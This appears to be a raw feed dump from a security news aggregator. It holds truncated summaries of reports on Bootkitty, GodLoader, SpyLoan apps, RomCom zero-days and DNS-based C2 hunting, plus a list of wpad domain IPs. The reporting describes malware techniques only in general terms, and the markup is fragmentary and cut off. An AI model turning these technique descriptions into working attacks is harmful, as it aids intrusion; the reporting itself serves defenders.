Getronics investit 1 million d\'euros pour améliorer les opérations de sécurité de ses clients internationaux avec Exabeam Getronics s\'appuiera sur la plateforme SIEM LogRhythm d\'Exabeam pour proposer une contextualisation complète des logs, une détection améliorée des menaces et une interface centrée sur l\'utilisateur. - Business]]> 2024-12-03T07:54:04+00:00 https://www.globalsecuritymag.fr/getronics-etend-son-partenariat-avec-exabeam.html www.secnews.physaphae.fr/article.php?IdArticle=8618902 False Threat None 2.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC According to a study, seven out of ten employers run an employee background check on social media platforms and have rejected 57% of people]]> 2024-12-03T07:00:00+00:00 https://levelblue.com/blogs/security-essentials/best-ways-to-reduce-your-digital-footprint-now www.secnews.physaphae.fr/article.php?IdArticle=8618898 False Spam,Tool,Threat,Studies,Medical Yahoo 2.0000000000000000 ProofPoint - Cyber Firms Traditionally, on-premises SMTP relays were the means by which messaging and security teams controlled email sending from on-premises applications on behalf of their organizations\' domains. With this control, it was relatively straightforward to protect against brand damage and the loss of sensitive data. It also helped to protect recipients from fraud.  However, as applications modernize and move to the cloud, email sending has changed. Today, it\'s often outsourced to services that are offered by cloud service providers or third parties. This means ]]> 2024-12-03T06:27:33+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/how-secure-your-amazon-ses-email-proofpoint-secure-email-relay www.secnews.physaphae.fr/article.php?IdArticle=8619005 False Spam,Malware,Threat,Cloud None 2.0000000000000000 HackRead - Chercher Cyber New zero-day attack bypasses antivirus, sandboxes, and spam filters using corrupted files. Learn how ANY.RUN\'s sandbox detects and…]]> 2024-12-03T01:03:36+00:00 https://hackread.com/how-attackers-use-corrupted-files-slip-past-security/ www.secnews.physaphae.fr/article.php?IdArticle=8618856 False Spam,Vulnerability,Threat None 2.0000000000000000 TrendLabs Security - Editeur Antivirus Our researchers identified threat actors exploiting misconfigured Docker servers to spread the Gafgyt malware. This threat traditionally targets IoT devices; this new tactic signals a change in its behavior.]]> 2024-12-03T00:00:00+00:00 https://www.trendmicro.com/en_us/research/24/l/gafgyt-malware-targeting-docker-remote-api-servers.html www.secnews.physaphae.fr/article.php?IdArticle=8618906 False Malware,Threat None 2.0000000000000000 Recorded Future - FLux Recorded Future Lidar, now used globally in a wide variety of civilian and military use cases, “stands at the center of Beijing\'s bid for technological superiority,” the report says, warning that Chinese companies are taking control of the global lidar market.]]> 2024-12-02T22:02:30+00:00 https://therecord.media/china-lidar-national-security-threat-report www.secnews.physaphae.fr/article.php?IdArticle=8618822 False Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot ESET researchers have identified Bootkitty, a UEFI bootkit that targets Linux systems, specifically a few Ubuntu versions. However, Bootkitty appears to be more of a proof of concept than actively used malware, as it supports only a limited number of systems due to hardcoded byte patterns and lacks kernel-version checks. The bootkit modifies kernel version strings and alters the first environment variable of the init process to preload potentially malicious shared objects. ## Description Bootkitty is capable of bypassing UEFI Secure Boot by modifying the boot process, including the GRUB bootloader and the Linux kernel\'s EFI stub loader. It disables the kernel\'s signature verification feature, allowing it to preload two unknown ELF binaries via the Linux init process. The bootkit patches the decompressed Linux kernel image in memory, which could lead to system crashes if it patches incorrect code or data. It is signed with a self-signed certificate, which means it cannot run on systems with UEFI Secure Boot enabled unless the attacker\'s certificates have been installed.  ]]> 2024-12-02T20:51:57+00:00 https://community.riskiq.com/article/27fd0302 www.secnews.physaphae.fr/article.php?IdArticle=8618815 False Malware,Threat None 2.0000000000000000 Techworm - News wrote in a blog post published last week. According to the security software company, the 15 SpyLoan apps operate using a shared framework designed to encrypt and exfiltrate sensitive data from a victim\'s device to a command and control (C2) server, indicating that the same developer or group of cybercriminals is behind all of them. SpyLoan apps masquerade as legitimate loan providers under deceptive names and logos, creating a false sense of trust. These apps pose as genuine loan services, promising instant credit with minimal requirements to unsuspecting users in Mexico, Colombia, Senegal, Thailand, Indonesia, Vietnam, Tanzania, Peru, and Chile. Once a user registers for the service, these apps use a one-time password (OTP) to ensure they have a phone number from the targeted region. The users are then prompted to provide supplementary identification documents and personal information, banking accounts, employee information, and device data that are subsequently exfiltrated from the victims to the C2 server in an encrypted format. However, these apps secretly collect sensitive data, including contacts, call logs, and SMS messages, under the pretense of processing loans. They also employ aggressive tactics, such as demanding additional mobile app permissions and intimidating users with threatening messages or calls, including death threats. Once the loan is disbursed, users often find themselves trapped in high-interest repayment schemes. The operators misuse the stolen phone data to harass and blackmail borrowers, often contacting family members to pressure repayment. According to McAfee Labs, malicious SpyLoan apps and unique infected devices have increased by over 75% from the end of Q2 to the end of Q3 2024. 5 of these apps are still available for download on the official app store, as they have reportedly made adjustments to align with Google Play policies. To mitigate the risks posed by such apps, it is advisable to read app permissions carefully, read app reviews to see if any issues have been reported, avoid downloading apps from third-party marketplaces, check the legitimacy of the application publisher before downloading them, and install and update security software. “The threat of Android apps like SpyLoan is a global issue that exploits users’ trust and financial desperation. Despite law enforcement actions to capture multiple groups linked to the operation of SpyLoan apps, new operators and cybercriminals continue to exploit these fraud activities,” Ruiz said. “SpyLoan apps operate with similar code at app and C2 level across different continents. This suggests the presence of a common developer or a shared framework that is being sold to cybercriminals. This modular approach allows these developers to quickly distribute malicious apps tailored to various markets, exploiting local vulnerabilities while maintaining a consistent model for scamming users.”

---

Security researcher]]> 2024-12-02T20:25:02+00:00 https://www.techworm.net/2024/12/spyloan-malware-million-android.html www.secnews.physaphae.fr/article.php?IdArticle=8630525 False Malware,Vulnerability,Threat,Legislation,Mobile None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Targeted Geolocations - Western Europe - Eastern Europe - North America ## Snapshot Recorded Future\'s Insikt Group has uncovered Operation Undercut, a covert influence campaign orchestrated by Russia\'s Social Design Agency (SDA) aimed at undermining Western support for Ukraine and sowing discord within Western societies. Employing AI-enhanced videos and impersonating reputable news outlets, the operation spreads disinformation to target audiences in the US, Europe, and Ukraine, while also addressing geopolitical issues like the Is]]> 2024-12-02T19:56:32+00:00 https://community.riskiq.com/article/ca4c0b91 www.secnews.physaphae.fr/article.php?IdArticle=8618804 False Threat,Prediction None 2.0000000000000000 Global Security Mag - Site de news francais Produits

---

OpenCTI de Filigran, la cybertech européenne, se dote de nouvelles capacités pour aider les organisations à mieux lutter contre les menaces cyber - Produits]]> 2024-12-02T13:47:24+00:00 https://www.globalsecuritymag.fr/filigran-fait-evoluer-sa-plateforme-opencti.html www.secnews.physaphae.fr/article.php?IdArticle=8618674 False Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-12-02T12:13:17+00:00 https://community.riskiq.com/article/3c8b5d6b www.secnews.physaphae.fr/article.php?IdArticle=8618668 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Medical None 2.0000000000000000 Checkpoint Research - Fabricant Materiel Securite For the latest discoveries in cyber research for the week of 2nd December, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Supply chain software provider Blue Yonder was hit by a ransomware attack, disrupting services for clients like Starbucks and UK grocery chains Morrisons and Sainsbury’s. The incident affected operations such as employee […]

---

>For the latest discoveries in cyber research for the week of 2nd December, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Supply chain software provider Blue Yonder was hit by a ransomware attack, disrupting services for clients like Starbucks and UK grocery chains Morrisons and Sainsbury’s. The incident affected operations such as employee […] ]]> 2024-12-02T11:55:22+00:00 https://research.checkpoint.com/2024/2nd-december-threat-intelligence-report/ www.secnews.physaphae.fr/article.php?IdArticle=8618641 False Ransomware,Threat None 2.0000000000000000 The State of Security - Magazine Américain The issue of diversity in the cybersecurity sector has been present since the early days of IT companies. The public perception of a cybersecurity professional carries with it a specific image of the kind of person who works in IT and cybersecurity, and many minority groups-including women, people of color and ethnic minorities, and disabled and neurodivergent people-are heavily underrepresented in the workforce. Diversity in the cyber workforce is more than just a social issue. Fighting cybersecurity risks is difficult, especially as the threat landscape is constantly evolving and shifting...]]> 2024-12-02T04:36:20+00:00 https://www.tripwire.com/state-of-security/diversity-can-be-powerful-tool-combating-increasing-cybersecurity-threats www.secnews.physaphae.fr/article.php?IdArticle=8618625 False Tool,Threat None 2.0000000000000000 The State of Security - Magazine Américain The holiday shopping season is here, and while it brings excitement and joy, it also opens opportunities for cybercriminals to exploit unsuspecting shoppers. With more people buying gifts online and taking advantage of holiday deals, the risk of falling victim to cyberattacks increases. Whether you\'re shopping from your desktop, mobile device, or in-store, it\'s essential to be aware of common threats and take steps to protect yourself. Here\'s a guide on how to stay safe while you enjoy the holiday shopping season: Beware of Phishing Scams Phishing scams are one of the most common ways to steal...]]> 2024-12-02T04:17:51+00:00 https://www.tripwire.com/state-of-security/cyber-safe-shopping-protect-yourself-holiday-scams-and-cyber-threats www.secnews.physaphae.fr/article.php?IdArticle=8618627 False Threat,Mobile None 2.0000000000000000 RedTeam PL - DarkTrace: AI bases detection https://tools.ietf.org/html/rfc8484]) can help a lot in hiding communication with C&C (a.k.a. C2). What is new in this case and changes a lot, is that well known and trusted vendors such as Google, CloudFlare etc are starting to run its own DoH services. This new future can be used by red teamers as well as abused by threat actors such as attackers, malware creators etc. Few words about current common approach to detection One of general approaches used in threat hunting is detection of malicious communication based on the DNS traffic. When an attacker is communicating with the C&C using old style methods such as HTTP(S) it is quite easy to discover such communication, if an organisation has anything which is able to detect such attack like DNS firewall (e.g. OpenDNS Family Shield [https://signup.opendns.com/familyshield/]) and/or traffic inspection using SIEM etc, because common detection tools are using blacklists of malicious domains. When security researchers are using honeypots, perform malware analysis etc, or targeted companies report malicious domains, other organisations can collect these artifacts like domains and use it for detection and/or blocking (e.g. DNS blackhole). As it is described in The Pyramid of Pain [http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html], this is one of the simplest mechanisms for threat hunting. Another common way for malicious communication is to perform communication with C&C only over DNS queries and that way malware can communicate with C&C using for example TXT, AXFR or ANY DNS records, but not only these as it all depends on creativity. Quoting Cisco Talos Intelligence Group [https://blog.talosintelligence.com/2017/03/dnsmessenger.html]: “Typically this use of DNS is related to the exfiltration of information. Talos recently analyzed an interesting malware sample that made use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker. This is an extremely uncommon and evasive way of administering a RAT.”, but in fact, this is not extremely uncommon [https://attack.mitre.org/techniques/T1071/]]> 2024-12-01T16:28:12+00:00 https://blog.redteam.pl/2019/04/dns-based-threat-hunting-and-doh.html www.secnews.physaphae.fr/article.php?IdArticle=8618480 False Malware,Tool,Threat None 3.0000000000000000 RedTeam PL - DarkTrace: AI bases detection https://blog.redteam.pl/2019/05/badwpad-dns-suffix-wpad-wpadblocking-com.html]. WPAD TLDs First of all we checked TLD list from IANA [https://data.iana.org/TLD/tlds-alpha-by-domain.txt] for first level of wpad domains: 101.37.23.113 wpad.bike 104.18.54.241 wpad.mobi 104.18.55.241 wpad.mobi 104.199.123.6 wpad.ac 104.24.104.177 wpad.online 104.24.104.228 wpad.army 104.24.105.177 wpad.online 104.24.105.228 wpad.army 104.24.120.45 wpad.space 104.24.121.45 wpad.space 104.25.51.128 wpad.world 104.27.176.234 wpad.site 104.27.177.234 wpad.site 104.27.188.57 wpad.co 104.27.189.57 wpad.co 104.28.10.19 wpad.kz 104.28.11.19 wpad.kz 104.31.74.75 wpad.exchange ]]> 2024-12-01T15:56:58+00:00 https://blog.redteam.pl/2019/05/wpad-software-case-dns-threat-hunting.html www.secnews.physaphae.fr/article.php?IdArticle=8618460 False Malware,Threat APT 32 2.0000000000000000 RedTeam PL - DarkTrace: AI bases detection 2024-12-01T15:51:25+00:00 https://blog.redteam.pl/2019/05/badwpad-dns-suffix-wpad-wpadblocking-com.html www.secnews.physaphae.fr/article.php?IdArticle=8618461 False Threat,Mobile None 3.0000000000000000 Kaspersky - Kaspersky Research blog The non-mobile threat report for Q3 2024 contains data on ransomware, miners, and macOS and IoT threats.]]> 2024-11-29T10:00:59+00:00 https://securelist.com/malware-report-q3-2024-non-mobile-statistics/114695/ www.secnews.physaphae.fr/article.php?IdArticle=8618233 False Ransomware,Threat None 2.0000000000000000 Kaspersky - Kaspersky Research blog The Q3 2024 mobile threat statistics encompass data on cyberattacks against Android devices involving malware, adware and potentially unwanted apps.]]> 2024-11-29T10:00:38+00:00 https://securelist.com/malware-report-q3-2024-mobile-statistics/114692/ www.secnews.physaphae.fr/article.php?IdArticle=8618234 False Malware,Threat,Mobile None 2.0000000000000000 Kaspersky - Kaspersky Research blog In this part of the malware report we discuss the most remarkable findings of Q3 2024, including APT and hacktivist attacks, ransomware, stealers, macOS malware and so on.]]> 2024-11-29T10:00:33+00:00 https://securelist.com/malware-report-q3-2024/114678/ www.secnews.physaphae.fr/article.php?IdArticle=8618235 False Ransomware,Malware,Threat None 3.0000000000000000 Global Security Mag - Site de news francais Business

---

ESET vient enrichir l\'écosystème OpenCTI de ses flux de Cyber Threat Intelligence ESET et Filigran annoncent une intégration des flux CTI d\'ESET à la plateforme OpenCTI. La mise à disposition native d\'ESET Threat Intelligence dans OpenCTI augmente l\'efficacité des analyses pour les équipes de cybersécurité. Travaillant de concert à une intégration poussée, les échanges de données sont optimisés et la réponse aux menaces est accélérée. L\'objectif commun est de réduire significativement le temps de traitement des incidents. - Business]]> 2024-11-29T08:51:03+00:00 https://www.globalsecuritymag.fr/eset-annonce-un-nouveau-partenariat-avec-filigran.html www.secnews.physaphae.fr/article.php?IdArticle=8618220 False Threat None 2.0000000000000000 InformationSecurityBuzzNews - Site de News Securite As Black Friday approaches, shoppers eagerly hunt for bargains online, but so do malicious actors. Cyber criminals are like pick-pockets, they go where the crowds are, so this high-traffic shopping season presents a smorgasbord of opportunities for malefactors to exploit vulnerabilities, from phishing scams to fake retail websites. With digital transactions expected to skyrocket, staying [...]]]> 2024-11-29T06:15:07+00:00 https://informationsecuritybuzz.com/shop-smart-black-friday-edition/ www.secnews.physaphae.fr/article.php?IdArticle=8618215 False Vulnerability,Threat None 1.00000000000000000000 InformationSecurityBuzzNews - Site de News Securite Check Point Research has discovered that cybercriminals are exploiting the popular Godot Engine to spread malware, bypassing detection by nearly all antivirus solutions. The new technique uses Godot’s scripting language, GDScript, to deliver malicious payloads through a loader dubbed “GodLoader,” which has infected over 17,000 devices since June 2024. New Threat Vector in Gaming Development [...]]]> 2024-11-29T06:01:28+00:00 https://informationsecuritybuzz.com/godot-gaming-engine-exploited-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8618210 False Malware,Threat None 2.0000000000000000 InformationSecurityBuzzNews - Site de News Securite Spearphishing attacks with links and attachments increased in Q3 2024, accounting for 46% of security incidents, ReliaQuest\'s Top Cyber Attacker Techniques report has revealed. Initial access methods like spear phishing were the most common MITRE ATT&CK techniques last quarter and have remained so in Q3 2024. According to ReliaQuest, high employee turnover and the accessibility of [...]]]> 2024-11-29T05:52:31+00:00 https://informationsecuritybuzz.com/phishing-attacks-dominate-threat-lands/ www.secnews.physaphae.fr/article.php?IdArticle=8618211 False Threat None 3.0000000000000000 Techworm - News Gaming Engines: An Undetected Playground for Malware Loaders,” the researchers say they believe that the threat actor behind the GodLoader malware has been using it since June 29, 2024, and has infected more than 17,000 devices so far. Notably, these payloads included cryptocurrency miners like XMRig, which was hosted on a private Pastebin file uploaded on May 10, 2024. The file contained the XMRigconfiguration related to the campaign, which was visited 206,913 times. The malware is distributed via the Stargazers Ghost Network, which operates as a Distribution-as-Service (DaaS) model, enabling malicious malware’s “legitimate” distribution through GitHub repositories. Approximately 200 repositories and more than 225 Stargazer Ghost accounts were used to distribute GodLoader throughout September and October. The attacks, targeting developers, gamers, and general users, were carried out in four waves via GitHub repositories on September 12, September 14, September 29, and October 3, 2024, tempting them to download infected tools and games. “Godot uses .pck (pack) files to bundle game assets and resources, such as scripts, scenes, textures, sounds, and other data. The game can load these files dynamically, allowing developers to distribute updates, downloadable content (DLC), or additional game assets without modifying the core game executable,” Check Point researchers said in the report. “These pack files might contain elements related to the games, images, audio files, and any other “static” files. In addition to these static files, .pck files can include scripts written in GDScript (.gd). These scripts can be executed when the .pck is loaded using the built-in callback function _ready(), allowing the game to add new functionality or modify existing behavior. “This feature gives attackers many possibilities, from downloading additional malware to executing remote payloads-all while remaining undetected. Since GDScript is a fully functional language, threat actors have many functions like anti-sandbox, anti-virtual machine measures, and remote payload execution, enabling the malware to remain undetected.” While the researchers only identified GodLoader samples specifically targeting Windows systems, they also developed a proof-of-concept exploit using GDScript, demonstrating how easily the malware could be adapted to target Linux and macOS systems. To reduce the risks posed by threats like GodLoader, it is crucial to keep operating systems and applications updated with timely patches and exercise caution with unexpe]]> 2024-11-28T16:02:54+00:00 https://www.techworm.net/2024/11/hacker-exploit-godot-game-engine-malware.html www.secnews.physaphae.fr/article.php?IdArticle=8630526 False Malware,Tool,Vulnerability,Threat,Mobile,Technical None 2.0000000000000000 IndustrialCyber - cyber risk firms for industrial The Australian Signals Directorate\'s Australian Cyber Security Centre (ASD\'s ACSC) recently published the 2023–24 Annual Cyber Threat Report... ]]> 2024-11-28T15:59:36+00:00 https://industrialcyber.co/reports/australias-cyber-defense-report-highlights-evolving-threats-and-strategic-countermeasures/ www.secnews.physaphae.fr/article.php?IdArticle=8618164 False Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) A popular open-source game engine called Godot Engine is being misused as part of a new GodLoader malware campaign, infecting over 17,000 systems since at least June 2024. "Cybercriminals have been taking advantage of Godot Engine to execute crafted GDScript code which triggers malicious commands and delivers malware," Check Point said in a new analysis published Wednesday. "The technique]]> 2024-11-28T14:59:00+00:00 https://thehackernews.com/2024/11/cybercriminals-exploit-popular-game.html www.secnews.physaphae.fr/article.php?IdArticle=8618136 False Malware,Threat None 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine This vulnerability was patched in May 2024 but was only allocated a CVE in November after evidence of exploitation]]> 2024-11-28T13:00:00+00:00 https://www.infosecurity-magazine.com/news/exploit-projectsend-critical/ www.secnews.physaphae.fr/article.php?IdArticle=8618150 False Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-27T20:21:51+00:00 https://community.riskiq.com/article/c958d17f www.secnews.physaphae.fr/article.php?IdArticle=8618094 False Ransomware,Tool,Threat APT 45 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The threat actor known as APT-C-60 has been linked to a cyber attack targeting an unnamed organization in Japan that used a job application-themed lure to deliver the SpyGlace backdoor. That\'s according to findings from JPCERT/CC, which said the intrusion leveraged legitimate services like Google Drive, Bitbucket, and StatCounter. The attack was carried out around August 2024. "In this attack,]]> 2024-11-27T16:44:00+00:00 https://thehackernews.com/2024/11/apt-c-60-exploits-wps-office.html www.secnews.physaphae.fr/article.php?IdArticle=8618004 False Vulnerability,Threat None 2.0000000000000000 HackRead - Chercher Cyber Watch out for the Russian hackers from the infamous RomRom group, also known as Storm-0978, Tropical Scorpius, or UNC2596, and their use of a custom backdoor.]]> 2024-11-27T16:15:07+00:00 https://hackread.com/russian-hackers-firefox-windows-0-days-backdoor/ www.secnews.physaphae.fr/article.php?IdArticle=8618061 False Threat None 2.0000000000000000 Netskope - etskope est une société de logiciels américaine fournissant une plate-forme de sécurité informatique Continuing our ongoing series collecting predictions from our many subject-matter experts here at Netskope, we gathered some hot topics and predictions from the Netskope Threat Labs team based on what they are starting to see evolving in the landscape. Here\'s what they had to say: The great AI crackdown Ray Canzanese, Director of Netskope Threat […]

---

>Continuing our ongoing series collecting predictions from our many subject-matter experts here at Netskope, we gathered some hot topics and predictions from the Netskope Threat Labs team based on what they are starting to see evolving in the landscape. Here\'s what they had to say: The great AI crackdown Ray Canzanese, Director of Netskope Threat […] ]]> 2024-11-27T15:00:00+00:00 https://www.netskope.com/blog/netskope-threat-labs-predictions-for-2025 www.secnews.physaphae.fr/article.php?IdArticle=8618044 False Threat,Prediction None 3.0000000000000000 Korben - Bloger francais Aujourd’hui nous allons plonger dans les entrailles obscures de Linux pour y découvrir un truc particulièrement intéressant : Bootkitty, le premier bootkit conçu spécifiquement pour infiltrer nos chers systèmes libres. Alors faut savoir que jusqu’à présent, les bootkits - ces programmes malveillants qui s’incrustent dans le processus de démarrage - étaient l’apanage exclusif du monde Windows. Tout a commencé en 2012 avec une première preuve de concept (PoC) par Andrea Allievi, suivie par d’autres tentatives comme EfiGuard ou Boot Backdoor puis en 2021, on a vu apparaître les premiers bootkits UEFI dans la nature avec ESPecter et FinSpy, puis BlackLotus en 2023 qui a réussi l’exploit de contourner le Secure Boot. Mais tous ces petits malins ne visaient que Windows. Ah ah ah ! Chè comme dirait l’autre.]]> 2024-11-27T14:49:48+00:00 https://korben.info/bootkitty-premier-bootkit-linux-demasque-recherche.html www.secnews.physaphae.fr/article.php?IdArticle=8618036 False Threat None 1.00000000000000000000 ProofPoint - Cyber Firms 2024-11-27T14:28:49+00:00 https://www.proofpoint.com/us/blog/insider-threat-management/identity-security-takeaways-from-protect-2024 www.secnews.physaphae.fr/article.php?IdArticle=8618018 False Tool,Vulnerability,Threat,Conference None 3.0000000000000000 Dark Reading - Informationweek Branch Over the past year, "Matrix" has used publicly available malware tools and exploit scripts to target weakly secured IoT devices - and enterprise servers.]]> 2024-11-27T14:00:00+00:00 https://www.darkreading.com/cyberattacks-data-breaches/russian-script-kiddie-assembles-massive-ddos-botnet www.secnews.physaphae.fr/article.php?IdArticle=8618027 False Malware,Tool,Threat None 2.0000000000000000 We Live Security - Editeur Logiciel Antivirus ESET ESET researchers make a discovery that signals a shift on the UEFI threat landscape and underscores the need for vigilance against future threats]]> 2024-11-27T13:16:11+00:00 https://www.welivesecurity.com/en/videos/bootkitty-new-chapter-uefi-threats/ www.secnews.physaphae.fr/article.php?IdArticle=8648732 False Threat None 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Russia-backed hackers, known as RomCom, have exploited critical zero-day vulnerabilities in Mozilla Firefox and Windows to launch targeted attacks]]> 2024-11-27T11:00:00+00:00 https://www.infosecurity-magazine.com/news/romcom-apt-zeroday-flaws-firefox/ www.secnews.physaphae.fr/article.php?IdArticle=8617997 False Vulnerability,Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) A threat actor named Matrix has been linked to a widespread distributed denial-of-service (DoD) campaign that leverages vulnerabilities and misconfigurations in Internet of Things (IoT) devices to co-opt them into a disruptive botnet. "This operation serves as a comprehensive one-stop shop for scanning, exploiting vulnerabilities, deploying malware, and setting up shop kits, showcasing a]]> 2024-11-27T10:51:00+00:00 https://thehackernews.com/2024/11/matrix-botnet-exploits-iot-devices-in.html www.secnews.physaphae.fr/article.php?IdArticle=8617968 False Malware,Vulnerability,Threat None 2.0000000000000000 InformationSecurityBuzzNews - Site de News Securite Attackers leveraging vulnerabilities in Virtual Private Networks (VPNs) and exploiting weak passwords accounted for 28.7% of ransomware incidents in Q3 2024, according to Corvus Insurance\'s latest Cyber Threat Report. Common credentials like “admin” and a lack of multi-factor authentication (MFA) left VPN systems vulnerable to automated brute-force attacks, highlighting the need for improved basic cyber [...]]]> 2024-11-27T06:26:10+00:00 https://informationsecuritybuzz.com/vpn-vulnerabilities-q3-ransomware/ www.secnews.physaphae.fr/article.php?IdArticle=8617972 False Ransomware,Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-27T02:12:54+00:00 https://community.riskiq.com/article/2b93a4d2 www.secnews.physaphae.fr/article.php?IdArticle=8617963 False Ransomware,Malware,Tool,Vulnerability,Threat,Patching None 3.0000000000000000 Intigrity - Blog As organizations continue adopting emerging technologies, they gain immense benefits but also face new security challenges. Cloud computing, AI, IoT, and blockchain are reshaping the cyber threat landscape, introducing powerful tools for defenders along with vulnerabilities for attackers to exploit. In this post, we explore how these technologies impact cybersecurity, the uniqu…]]> 2024-11-27T00:00:00+00:00 https://blog.intigriti.com/business-insights/the-cyber-threat-landscape-part-4-emerging-technologies-and-their-security-implic www.secnews.physaphae.fr/article.php?IdArticle=8618054 False Tool,Vulnerability,Threat,Cloud None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-26T21:59:55+00:00 https://community.riskiq.com/article/7dae7a55 www.secnews.physaphae.fr/article.php?IdArticle=8617947 False Spam,Malware,Tool,Threat,Mobile None 2.0000000000000000 Dark Reading - Informationweek Branch The innocuously named Russian-sponsored cyber threat actor has combined critical and serious vulnerabilities in Windows and Firefox products in a zero-click code execution exploit.]]> 2024-11-26T21:36:42+00:00 https://www.darkreading.com/application-security/romcom-apt-zero-day-zero-click-browser-escapes-firefox-tor www.secnews.physaphae.fr/article.php?IdArticle=8617943 False Vulnerability,Threat None 3.0000000000000000 RedCanary - Red Canary Stay ahead of modern adversaries with real-time identity monitoring, threat detection, and response from Red Canary and CrowdStrike Falcon]]> 2024-11-26T21:07:22+00:00 https://redcanary.com/blog/product-updates/crowdstrike-falcon-identity-protection-integration/ www.secnews.physaphae.fr/article.php?IdArticle=8617935 False Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-26T21:02:38+00:00 https://community.riskiq.com/article/db8b4022 www.secnews.physaphae.fr/article.php?IdArticle=8617948 False Ransomware,Malware,Tool,Threat,Industrial None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-11-26T20:22:49+00:00 https://community.riskiq.com/article/d3dd2b00 www.secnews.physaphae.fr/article.php?IdArticle=8617941 False Tool,Threat,Mobile None 2.0000000000000000